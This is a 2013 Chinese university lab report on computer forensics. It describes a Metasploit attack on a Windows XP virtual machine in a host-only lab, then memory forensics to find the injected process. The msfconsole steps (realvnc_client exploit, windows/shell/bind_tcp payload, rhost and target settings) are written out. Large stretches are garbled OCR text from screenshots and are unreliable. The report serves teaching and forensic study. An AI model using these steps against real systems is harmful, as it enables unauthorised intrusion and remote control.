实验报告-运用metasploit进行渗透攻击与取证

《计算机取证与司法鉴定》课内研究学习报告课题名称:运用metasploit进行渗透攻击与取证施教单位：计算机学院网络工程系任课教员：任江春副教授授课学期：2013年秋季学期培养类型：军事指挥类所属学院：九院4-3队专业年级：网络工程专业2010级姓名学号：聂上入201009021018姓名学号吴殿元201009021030姓名学号宋轲轮201009021023姓名学号易春昇201009021037实验概要实验目的：通过实验，实现从windows?到windowsxp系统的一次成功的渗透攻击，并在xp系统上进行取证。掌握对操作系统进行渗透攻击的一般方法，同时当自己遭遇渗透攻击或其他计算机领域的侵害时，能够掌握常用的取证办法。并能够对攻击进行取证。实验环境：Windows7操作系统主机一台，装有xp系统的一个virtualbox虚拟机，metasploits软件，内存管理专家(装在xp系统上)。实验原理：Metasploit是由HDMoore在2003年开发的一款开源的安全漏洞检测工具,用来进行网络安全中的漏洞发现、渗透攻击，IDS的识别标签等开发方面的开发工作。该工具在用户群和开发者中已以成倍的速度发展起来了，Metasploit为渗透测试者和研究员提供binaryexploitation,payloads和post-exploitationpayloads这样的一个高端平台。由开发商和社区所开发的Metasploit为一系列的操作系统，商业和开源软件提供exploit,一份exploit可以提供多种形式，但其最终目的仍然是明确的：控制程序执行流程。运用metasploit进行渗透攻击的主要原理就是利用各种操作系统中存在的漏洞如本地缓冲区溢出，堆污染，整数溢出或者格式串漏洞等进行攻击。在Metasploit宝库中的每一个exploit都提供很多的payload选项，payload实际上是以机器码的形式在受害者的机器上运行的。Payload可以简单地添加用户到系统中，或者将VNC服务注入到受害者电脑的进程中。因此，在进行取证时，我们需要对受害者系统内存中的进程进行分析。为了更为容易地访问物理内存，Windows公布一个名为\Device\PhysicalMemory的sectionobject。这个sectionobject一打开，应用程序即有一个指向物理内存的句柄。如果程序通过该句柄读取数据，那么它就会从物理内存中读取。在访问物理内存之前，Memoryze需要访问每一进程的虚拟地址空间。地址空间大小随着如线程，动态存储，栈，被加载的可执行文件等的内存需求而进行增减。WindowsMemoryManager(MM)管理着所有的这些信息，且是以二叉树的形式被管理的。在ExecutiveProcess(EPROCESS)结构当中一个名为VadRoot(VirtualAddressDescriptorRoot)的成员变量刚好指向该二叉树的根。每一进程均含有EPROCESS结构，其包含有进程管理器需要用来管理进程的信息。二叉树的入口实际上是一个名为MemoryManagerVirtualAddressDescriptors(MMVAD)结构。该结构包含有与MM相关的信息，如被描述的内存段的虚拟内存基址和大小。若想查看MMVAD结构及其成员，可在windbg中输入dt_MMVAD的命令以显示此结构信息。通过以上命令可以显示MMVAD结构及其成员的偏移地址和大小。这里所讨论的技术和研究只是内存取证的一个开端，特别是如何更好地利用发现的人为产生的内存数据进行内存取证的技术。事实上，Windows内存管理器功能在释放内存页后，并没有马上清除，这对于取证分析很有帮助。这种行为也类似于传统文件系统取证。当一个文件被删除后，只是从链表中解链，但开始并没有被覆写，它允许分析人员在文件删除后数天之内进行数据恢复。这只是迈出了第一步，至少证明了在取证人员的工具箱中内存取证仍占有一席之地。在以后的研究当中，还有更多的工作要做，以便更好地了解释放内存的限制。当内存被释放时，它只是被标记为不可用而已，但这些内存页所包含的数据并没有被清除或清零。这也就意味着一名分析师可以追回和查看内存，并找到释放的内存页。Meterpreterpacket在内部调度，以指示正确地释放payload。Meterpreter将通过调用packet_transmit_response来响应TLV，它将调用packet_transmit。这个函数实际上是用于发送TLV回复给客户端。响应包一发送，Meterpreter就会调用destroy_packet去释放”payload”。在我们的例子中，它将会释放整个响应包。但是，释放内存并不意味着它会丢失和不可获取。MSFF工程通过扫描每一块获取的内存块，然后查找攻击者在攻击过程中Meterpreter所发回的响应包中已知的“方法”字符串。MSFF工程扫描每个VAD中这些已知的字符串，如果找到，则开始分析TLV结构。由于TLV结构包含有type，以指示如何分析它的数据，MSFF利用这些信息恢复响应包。还因为Meterpreter调用回复方法来响应，这样MSFF就可以知道攻击者请求后响应的结果了。所有的这些信息都是从内存中获取的，可用于重现所发生的攻击过程。因此，通过分析这一过程可以是实现对于攻击的取证。实验过程攻击环节:首先，要让虚拟机中的xp系统与win7主机系统连接在同一网段上并能够相互访问。在这里，要特别注意虚拟机上的网卡设置必须为hostonly网卡，及连接在主机上的那个网卡。

C:MisersMldministpator>pir19?-168.56月9昏4章33赢房癌延谚迂配卷i^.rtl.rtL.<4DfiftFFffi4PFH41MFRA313r?R9C7RSlA>;:舞&己®5的-州日,三提漆道世配器recedeTuninslir^Pseuda-lntepfaccs®he后姣薯鲁回回回C:MisersMldministpator>pir19?-168.56月9昏4章33赢房癌延谚迂配卷i^.rtl.rtL.<4DfiftFFffi4PFH41MFRA313r?R9C7RSlA>;:舞&己®5的-州日,三提漆道世配器recedeTuninslir^Pseuda-lntepfaccs®he后姣薯鲁回回回的的.PJ-L7T二・、-■、,ri--JJ_JJFTTFTT『自自自Pijng.192.168-56,9?193.168.56,9?192.16B.56.??192.16B.5G^9衬2222

字*-3-3

%—，??「•

1丁亍：■亍字m・g8S3

括llllllMM

可可可TTL=128TTL=128TTL-128TIL-128止__IH.

步一步然后，启动metasploit软件，进入控制台，一步一步的从win7向止__IH.

步一步击。一、Showexploits击。一、*wnmili豪■总«*：♦a*Ss==♦4TSt■虹归收卸EaHS■HK3itsJ1XJHSSP：?*mnupultfZM^i*teH.Ll£n；M3iZ4氏皿日pWTCandle：.■.I1ET3Ems-g_.>—._ci.■u-T,/|\7-b,.Il^-iis/|\'.ici■-■■■■■.,ji\■>■IEl.-.f|X,■IHTIC，加••i_i_i11DT4>ha3i±xaqm=■[iMtiap^EXi:t4.--2-L|cnra:4.E«pa:3.□]+■---[S^-lt»P^£-1E■-?EJX'JHlldAYV-JQEp£>IE十[321P*WLi：7i]#-3Z-*LQfi#|■IEi^ly1心』7蜀电<ltupmrs-t>HUM七直ml.CC砖，■g如q退心0—击零£3<K|—hsws痈jUsewindows/vnc/realvnc_client（这儿是漏洞的名字）这里选择（缓冲区溢出漏洞realvnc_client）来对xp系统进行攻击。Showpayloads选择绑定方式，以此来保证入侵成功后用来获取权限四、三、Showpayloads选择绑定方式，以此来保证入侵成功后用来获取权限四、三、Setrhost00（这里输入你要攻击的主机的ip地址）五、Setpayloadwindows/shell/bind_tcp(选择绑定方式)WitT)显m孕羊・a事*园或a胡由eR中As拦七、幽•北、夜市直伸WitT)显m孕羊・a事*园或a胡由eR中As拦七、幽•北、夜市直伸”.r*■a.只毗呷B&4・用在或:«S*3，■皿H<WEd=IL・fr「Br捋砒1,#5AaBb(伯HB(A^BbC-NMI：心PpO心tSt±gtrilfvtil,Hh纸3d&*<)Sci^vrHTTPSmos-tS«r«erEfiftiitcn：!^]£.^e>：i：uni.Bi&jv^FKfo'HTj'raEdEi^i-rci'birur__w^>"fir-iar(Afl£lacEJ.¥«33iiCE.anr,31bKluC^allvrEl^TE.jB.ccun!.31rdtfindcicri'wis3HtO：iinnsH_^c：Kp女r■匕e(Rtfiearl^TEdiNimni■Iht^rM-■AndQM3.'，VnClQiJCCTi,XC"1：Z^：ipvIFbt<ip-■■E-WBE'(^Vf^aCUTfllE.^lr：!E3dn|,KaTtSMsfcr"crC^cflccblrc'Tt^cc^xanlitf^ndcKri'^ncdai'jiK3Ei,nnxrx_&cpiifcnar(£«壬JE.jiKEhdn|,dzs:**dinMMjj'vzKiDjec-GrieweiM^ia^op■!・ls・e*i^llacElmT&jiirCEidnl.HeheVXFbdaiU-i'WCiXijiaiCEi1EftT4XH_LC|>S«r»er牌皿eccmni.fe'^erw-v^ndcHTX^acdBOK^i*hinxM_t3Ipcnr'■MiriHr[JNlAautlM3E.^KELan|,融EiXt—All-Fart"TCP■<r»«rT^acci-anl.宁.・fhv«JCPviTWSI-■=>)M8H六、Showtargets（显示可以入侵的目标系统）MstsEploitProConsoleFileEditVitv/Help■=>)M8H七、Settarget1选择第1种，也就是我们要攻击的xp系统=ileEditViewHelpwindows/vncinject/工仁veraetcoServer(ReflectiveInjection)windows/vncinject/工仁veraetcoServer(ReflectiveInjection)rReverseTCPStagerwindows/vnainject/z?eversetcpaXlpoztsServer(Renectivein]ecrion)rELeverse」windows/vncinject/reverse_tcp_dnsSezver(ReflectiveInjectian}rFleversewindows/vncinject/reverse_tcp_rc4Server(ReflectiveInjection},Reversenwindows/vnainject/reverse_tc.p_rc^_dnsServer(ReflectiveInjection)rReverseTCPAii-PcrcTCPstagerTCFTCPStagerStagei?Staler|EN3>nozmalnormalnonnalV|RC4StageEncryption}normalvIRC4StaaeEncryptionDNSImsfexploit(realvnc_cliEnt)>setpayloadwindows/siiel1/bir.d_tcppayload=>windows/she1l/bindtcpmarexploit(reaJ.vnc_clienL>>showtargeusExploitta.Tg=ts:IdName0WindowsWindowsWindows2000SP4EnglishXPSP2English2003SP1Englishmsfexploit(realvnc_client)>ssttarget1target=>1八、Set（确认下）0WindowsWindowsWindows九、Exploit（开始入侵）QMetasploitProConsole±1.11—l.j'当匕七15—fcjt]J■HSZ^ZZ1FileEditViewHelp寻▼同耳|乌［£3)一，.Module:■windawa/vnc/zealvnc_clizntNamieVallieDisableFa^LoadHandlerEXITETJNCraisechxeadEnableContEKtEncD^dxngSB.VHC5IfalaeSRVPORTS9G0SSLfalseSSLVeraian35LSTCP：:Tnax_senl_slze□TCP::senddelayVERBOSE—Dfalaepayload,rhostwindows/sliell/&lnd._Lco192.1S0.E£-target1ni3TeKjJloit(■real^m^clienc)>eKploit[*]Exploitromingfasbackgioundjob.in^fexploit(realvncclient}>[*]3carLed.bind,handlerL*]Serveratarted.1Ready可以发现，我们已经对xp上的这一漏洞成功实现了渗透攻击。Metaspolit上的exploit进程已经作为xp系统上的一个后台程序在运行，并且成功捆绑住了该肉鸡(startedbindhandler)取证环节:1.在xp系统上运行内存分析软件一内存优化专家。

2.在内存优化专家中可以发现一个新的进程pg-ctl.Exe.这个就是刚刚win7攻击xp时注入的木马程序，它潜伏在xp系统中，并根据win7上的控制台的指令对xp系统进行控制操作。ftj-lnrtflwIPCvit-l^iirM*:inn^irnrl:幸地莲辑Irrnnl1n.1ftj-lnrtflwIPCvit-l^iirM*:inn^irnrl:幸地莲辑Irr